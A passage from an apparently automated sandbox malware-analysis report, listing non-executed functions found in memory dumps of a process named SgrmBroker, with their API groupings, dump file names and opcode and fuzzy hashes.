                                                                                      • Instruction Fuzzy Hash: 98F09049B5BB0745FE955FA299413BD02905FC9B80F4C7633C90ED63D1EE2EE4A04A10

                                                                                      Non-executed Functions

                                                                                      Function 00007FF6D9CF1530 Relevance: 48.1, APIs: 32, Instructions: 93clipboardsleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClipboardErrorLastOpen$Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 2345428929-0
                                                                                      • Opcode ID: 8bc31798e9080558fc23db62d35d874079c8e036ac0fb986cffdfbbb8a71fc80
                                                                                      • Instruction ID: 728f3bf4fcc7d22a91cd466df5d62aeafade9e9f3a09776ed5c02181ccff7f70
                                                                                      • Opcode Fuzzy Hash: 8bc31798e9080558fc23db62d35d874079c8e036ac0fb986cffdfbbb8a71fc80
                                                                                      • Instruction Fuzzy Hash: 02317F30F09A5252FBA87F71586A27E62B4AF14F8AF51893FC46BC5092DE3DE8354640
                                                                                      Function 00007FF6D9DC6400 Relevance: 24.4, APIs: 16, Instructions: 399COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$FullNamePath
                                                                                      • String ID:
                                                                                      • API String ID: 2482867836-0
                                                                                      • Opcode ID: b8b47616b5fafbadda312a8da6dec6732172c27f25d7d9e32547bde4186f5e0b
                                                                                      • Instruction ID: f7f4374b5c28d62013cd572725fa36748ba1b4af376d5c98b230fad30e03697f
                                                                                      • Opcode Fuzzy Hash: b8b47616b5fafbadda312a8da6dec6732172c27f25d7d9e32547bde4186f5e0b
                                                                                      • Instruction Fuzzy Hash: C6F19E66A0CB8281EB509F12E44477EA7A0FB48BD4F648636EE9D937D5DF7CD4A18300
                                                                                      Function 00007FF6D9D114F0 Relevance: 21.6, APIs: 17, Instructions: 389memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: bcd8e89032c6f3aa42770fb0e3e54d671988c5cbba16f515c2bfdacb64ea8e05
                                                                                      • Instruction ID: 9224973af7d16e2b3d1d1cf28cf5d060468ec115a425a6d92aaf8d7723c55179
                                                                                      • Opcode Fuzzy Hash: bcd8e89032c6f3aa42770fb0e3e54d671988c5cbba16f515c2bfdacb64ea8e05
                                                                                      • Instruction Fuzzy Hash: DE127F72A18F8182E7659F12E4443BD67A1FB89B94F098236DB9D97791CF3CE4A5C300
                                                                                      Function 00007FF6D9D34020 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 302memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap$ByteCharErrorLastMultiWide
                                                                                      • String ID: <Truncat$cess$ted>
                                                                                      • API String ID: 3126804124-3772979034
                                                                                      • Opcode ID: ea250121c60aa8c732f84ba9c4cbc7e749f0c9e2dab2be8177f80699b916e56a
                                                                                      • Instruction ID: 46c583f4d4fe483b8f5959e12e62ba6f20027980b913976bd3a8aa8ecd682f8f
                                                                                      • Opcode Fuzzy Hash: ea250121c60aa8c732f84ba9c4cbc7e749f0c9e2dab2be8177f80699b916e56a
                                                                                      • Instruction Fuzzy Hash: 56C1E122A08F8181E6518F25A8003BD6760FF98BA5F54C332DEAD977D5DF7CE5A28300
                                                                                      Function 00007FF6D9CF4970 Relevance: 13.8, APIs: 11, Instructions: 100memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: 8de49d5a1d2c016be2b0b26fbe25cf20a42dcd9b760b90ff907c633dc26d1d6c
                                                                                      • Instruction ID: b249d42b615f1f1ab38a7ef884addf19499bc468c75625c0b53df286c7d82ff8
                                                                                      • Opcode Fuzzy Hash: 8de49d5a1d2c016be2b0b26fbe25cf20a42dcd9b760b90ff907c633dc26d1d6c
                                                                                      • Instruction Fuzzy Hash: 10512765909A4282F7689F62E4C83BE63B1FF88B99F444437D75E86290CF3CE4A5D304
                                                                                      Function 00007FF6D9DC7230 Relevance: 12.2, APIs: 8, Instructions: 215threadmemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributeProcThread$InitializeList$FreeHeapUpdate
                                                                                      • String ID:
                                                                                      • API String ID: 3328213773-0
                                                                                      • Opcode ID: c651c8d6d05eec1ed23ec611c657b3822acaf404f4350c48edd8b64d2bc28124
                                                                                      • Instruction ID: 597b93786fdf3248651b8e9cd160f2f61b4234d13a622f6c479e53e1a4d500a3
                                                                                      • Opcode Fuzzy Hash: c651c8d6d05eec1ed23ec611c657b3822acaf404f4350c48edd8b64d2bc28124
                                                                                      • Instruction Fuzzy Hash: 2A81E562B1DE9681EA558F6695047BE67A1FF4CBE4F548332ED6E833D0DE3CE4618200
                                                                                      Function 00007FF6D9DB9FF0 Relevance: 9.2, APIs: 6, Instructions: 179filenativesynchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap$Error$ConsoleFileHandleLastModeObjectSingleStatusWaitWrite
                                                                                      • String ID:
                                                                                      • API String ID: 1829088854-0
                                                                                      • Opcode ID: 8e87be5dfc692f55cab4f3e7dcfc212c7cba7f4718a063207e5ec0de3b20204e
                                                                                      • Instruction ID: 1ae4ec40af5c8ad7263ba689fcde715cee7cc3247f429d710c82cef66beb6d13
                                                                                      • Opcode Fuzzy Hash: 8e87be5dfc692f55cab4f3e7dcfc212c7cba7f4718a063207e5ec0de3b20204e
                                                                                      • Instruction Fuzzy Hash: 6671E661A0CB8281FB608F25A6503BD67F1EB95798F448233DA9DC36D9DE7DE0A4C700
                                                                                      Function 00007FF6D9DD8D8C Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 1239891234-0
                                                                                      • Opcode ID: 24ec87278d5b50c55761d5e5a74ac69a402749e9621c205fbc0bc0ec95ba6e9c
                                                                                      • Instruction ID: d78b3f15a8eca5d538ee8be8940c202f29c0575af5bf406d52337a1920acc978
                                                                                      • Opcode Fuzzy Hash: 24ec87278d5b50c55761d5e5a74ac69a402749e9621c205fbc0bc0ec95ba6e9c
                                                                                      • Instruction Fuzzy Hash: 47315236618F8186DB60CF25E8802BE73A4FB89754F540636EA9D83B99DF3CD565CB00
                                                                                      Function 00007FF6D9DBF6C0 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebuggerPresent
                                                                                      • String ID:
                                                                                      • API String ID: 1347740429-0
                                                                                      • Opcode ID: 73192da0503f5c78fd08333144c87677a945f3e8c40e8de4ea1893f38325c44d
                                                                                      • Instruction ID: 3f102b20f07d433733eb1b513f5e0f8f2f2276227df4c69620790eb23ecffd0e
                                                                                      • Opcode Fuzzy Hash: 73192da0503f5c78fd08333144c87677a945f3e8c40e8de4ea1893f38325c44d
                                                                                      • Instruction Fuzzy Hash: 4DB01200F16403C2E6483F360C8613D01702F44B40FA04432C518C0160CD2C917B4620
                                                                                      Function 00007FF6D9CF46F0 Relevance: 12.7, APIs: 10, Instructions: 162memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: 284f0467a77bc4f605e16177d8e9475f95c948627949936a1b9038c7357cbbf8
                                                                                      • Instruction ID: 878420bef214208796cde232563448f588e2d31005a8f805dc41444401ec5879
                                                                                      • Opcode Fuzzy Hash: 284f0467a77bc4f605e16177d8e9475f95c948627949936a1b9038c7357cbbf8
                                                                                      • Instruction Fuzzy Hash: 7E716766A05A8182E7559F16E4483BD67B2FF89BE4F444633CB6E866D0DF3CE4A5C300
                                                                                      Function 00007FF6D9DD8210 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc
                                                                                      • String ID: MZx
                                                                                      • API String ID: 190572456-2575928145
                                                                                      • Opcode ID: e0ce3126c0ec86e077d6d75675942394944caefd053394c789b2ce584d65811c
                                                                                      • Instruction ID: fabc9c9d338435e4347278b88e791059a515ba0ef5bf88951a06429d487d01b1
                                                                                      • Opcode Fuzzy Hash: e0ce3126c0ec86e077d6d75675942394944caefd053394c789b2ce584d65811c
                                                                                      • Instruction Fuzzy Hash: 1A41D262B1AF42C2FA569F869C0457D6791BF84BE0F1D4636DE1DCB784EE3CE4648A00
                                                                                      Function 00007FF6D9DBC170 Relevance: 9.1, APIs: 6, Instructions: 116memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$FileFreeHeapModuleName
                                                                                      • String ID:
                                                                                      • API String ID: 2130810879-0
                                                                                      • Opcode ID: 329e5465cf36dad3e40d6bc9a0745c305f6f761a589be0d330fb658b25984a61
                                                                                      • Instruction ID: 3e0813d54039822d1399bda32da9e91a6581aa21366a697d219677ed002b98f5
                                                                                      • Opcode Fuzzy Hash: 329e5465cf36dad3e40d6bc9a0745c305f6f761a589be0d330fb658b25984a61
                                                                                      • Instruction Fuzzy Hash: 7D41E562A08E4141FB606E7AE44833E66B0BB497E8F500332EE5DE77C1DE7CD561C600
                                                                                      Function 00007FF6D9DCF060 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: CopyErrorLast$LengthValid
                                                                                      • String ID:
                                                                                      • API String ID: 2568129594-0
                                                                                      • Opcode ID: e5d1a205fec4471ae0c871e2daceb5122ab26e8edb20701cfc6c749461f361bf
                                                                                      • Instruction ID: c2aa45bd5acf3ec7816b9f2d5ce843e709268840c1c2a20c74b4256103bf32f8
                                                                                      • Opcode Fuzzy Hash: e5d1a205fec4471ae0c871e2daceb5122ab26e8edb20701cfc6c749461f361bf
                                                                                      • Instruction Fuzzy Hash: 58116361B09E4341FB956F17A9803BE66956F49FD0F04C13ADE8DDA791EE3CA4A29300
                                                                                      Function 00007FF6D9D17120 Relevance: 8.8, APIs: 7, Instructions: 62memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: 3ac6476be0c3b383947b5493cbede7b9f28472ce701b9c380af2de8f0d378277
                                                                                      • Instruction ID: 67a9c8ad4e7c327cf23f8a7d5f60909e606afc4e48e634deb778d9789df94439
                                                                                      • Opcode Fuzzy Hash: 3ac6476be0c3b383947b5493cbede7b9f28472ce701b9c380af2de8f0d378277
                                                                                      • Instruction Fuzzy Hash: F531F066904E4182F368AF26E8843BD67A2FF89B54F445533DA4E976A0CF3CE4E5D300
                                                                                      Function 00007FF6D9DB9740 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 201memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID: main
                                                                                      • API String ID: 3298025750-3207122276
                                                                                      • Opcode ID: 0940b839725ae36b5a1ad9fbce4c34a275031e632e3d9234af1e099074fd8663
                                                                                      • Instruction ID: cab9ee87cf6012626375fdf0eade33e240fb2e740caf3b5e2e1dda8cd7c7e30a
                                                                                      • Opcode Fuzzy Hash: 0940b839725ae36b5a1ad9fbce4c34a275031e632e3d9234af1e099074fd8663
                                                                                      • Instruction Fuzzy Hash: 8A813036A08E8181EA608F16E58437DA3B1EF89B98F544237DA9DC77A4DF3CE465C700
                                                                                      Function 00007FF6D9DBEE20 Relevance: 7.7, APIs: 5, Instructions: 186memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap$AddressSingleWake
                                                                                      • String ID:
                                                                                      • API String ID: 2995119335-0
                                                                                      • Opcode ID: 421e2ceb116bf0c9edc8edd637012c73a9e06c37a358bdcd2894536ef235a773
                                                                                      • Instruction ID: dc679c46131d283555c39764f5f2182b635d37fd3b66e5308521e46731cbe676
                                                                                      • Opcode Fuzzy Hash: 421e2ceb116bf0c9edc8edd637012c73a9e06c37a358bdcd2894536ef235a773
                                                                                      • Instruction Fuzzy Hash: AA617D22A08E4146EA509F16D98437D67B1FF88B98F494633DE4DC77A1CE3DE4A28381
                                                                                      Function 00007FF6D9DBA2C0 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 1956605914-0
                                                                                      • Opcode ID: 6727169349466a80a5377bb4e83f99f5f7794e299e60947d92bd081cc1b73e53
                                                                                      • Instruction ID: 624ad2ba1ed766eed199514d078695da96e9307d1e2ffcd53945899dd6f82df4
                                                                                      • Opcode Fuzzy Hash: 6727169349466a80a5377bb4e83f99f5f7794e299e60947d92bd081cc1b73e53
